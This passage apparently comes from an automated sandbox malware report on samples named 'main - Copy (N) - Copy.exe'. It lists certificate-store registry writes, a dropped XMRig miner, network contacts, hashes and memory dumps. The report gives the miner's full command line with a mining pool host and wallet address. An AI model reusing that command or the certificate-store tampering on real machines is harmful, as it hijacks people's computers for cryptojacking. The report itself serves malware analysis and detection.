Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (9) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 13.107.21.237:443 g.bing.com tcp
US 8.8.8.8:53 g.bing.com udp
NL 23.62.61.194:443 www.bing.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 203.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 237.21.107.13.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 194.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.110.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 45.76.89.70:80 pool.hashvault.pro tcp
US 8.8.8.8:53 70.89.76.45.in-addr.arpa udp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 30.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 138.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/3120-14-0x0000014B62190000-0x0000014B621B0000-memory.dmp

memory/3120-15-0x0000014B63CA0000-0x0000014B63CC0000-memory.dmp

memory/3120-16-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-19-0x0000014B63CE0000-0x0000014B63D00000-memory.dmp

memory/3120-18-0x0000014B63CC0000-0x0000014B63CE0000-memory.dmp

memory/3120-17-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-20-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-21-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-22-0x0000014B63CC0000-0x0000014B63CE0000-memory.dmp

memory/3120-23-0x0000014B63CE0000-0x0000014B63D00000-memory.dmp

memory/3120-24-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-25-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-26-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-27-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-28-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-29-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-30-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-31-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-32-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-33-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-34-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-35-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-36-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-37-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-38-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-39-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-40-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-41-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-42-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-43-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-44-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-45-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-46-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-47-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-48-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-49-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-50-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-51-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-52-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-53-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-54-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-55-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-56-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-57-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-58-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-59-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-60-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-61-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-62-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-63-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-64-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-65-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-66-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-67-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-68-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-69-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-70-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-71-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-72-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-73-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-74-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-75-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-76-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-77-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-78-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-79-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-80-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-81-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

memory/3120-82-0x00007FF7566F0000-0x00007FF7571F3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-06-14 12:47

Reported

2024-06-14 13:30

Platform

win10v2004-20240611-en

Max time kernel

1795s

Max time network

1788s

Command Line

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349 C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 0f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 1900000001000000100000002aa1c05e2ae606f198c2c5e937c97aa2030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e3491d00000001000000100000002e0d6875874a44c820912e85e964cfdb140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef453000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b060105050703080f00000001000000140000003e8e6487f8fd27d322a269a71edaac5d57811286200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe

"C:\Users\Admin\AppData\Local\Temp\main - Copy (4) - Copy.exe"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

xmrig-6.21.0\xmrig.exe --url pool.hashvault.pro:80 --user 46DiTxnXmukGpoGKFDViugiZA1Zuu181wJGSTvGVyJUv4HAdJaozh3jMX7nAEauswGVAUvLnY6tai2AbiKv9Pbt2EAsu8yR --pass T --donate-level 1 --tls --tls-fingerprint 420c7850e09b7c0bdcf748a7da9eb3647daf8515718f36d9ccfdd6b9ff834b14

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 pool.hashvault.pro udp
DE 95.179.241.203:80 pool.hashvault.pro tcp
US 8.8.8.8:53 203.241.179.95.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 65.139.73.23.in-addr.arpa udp
US 8.8.8.8:53 233.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 240.197.17.2.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.0\xmrig.exe

MD5 e2fe87cc2c7dab8ca6516620dccd1381
SHA1 f714ec0448325435103519452610cf7aadf8bbba
SHA256 d0cf7388253342f43f9b04da27f3da9ee18614539efdc2d9c4a0239af51ddbe4
SHA512 8455c47e8470e0e322426bc9b9f3c7e858d803bfc8c5d576d580f88585f550b95043139d69b0750a3e211915e3f5ec7a67e7784dcf8cac6bd8fe51ab7e9cbed6

memory/528-14-0x00000150FC060000-0x00000150FC080000-memory.dmp

memory/528-15-0x00000150FC0B0000-0x00000150FC0D0000-memory.dmp

memory/528-16-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-17-0x00000150FD980000-0x00000150FD9A0000-memory.dmp

memory/528-18-0x00000150FD9A0000-0x00000150FD9C0000-memory.dmp

memory/528-19-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-20-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-21-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-22-0x00000150FD980000-0x00000150FD9A0000-memory.dmp

memory/528-23-0x00000150FD9A0000-0x00000150FD9C0000-memory.dmp

memory/528-24-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-25-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-26-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-27-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-28-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-29-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-30-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-31-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-32-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-33-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-34-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-35-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-36-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-37-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-38-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-39-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-40-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-41-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-42-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-43-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-44-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-45-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-46-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-47-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-48-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-49-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-50-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-51-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-52-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-53-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-54-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

memory/528-55-0x00007FF67E350000-0x00007FF67EE53000-memory.dmp

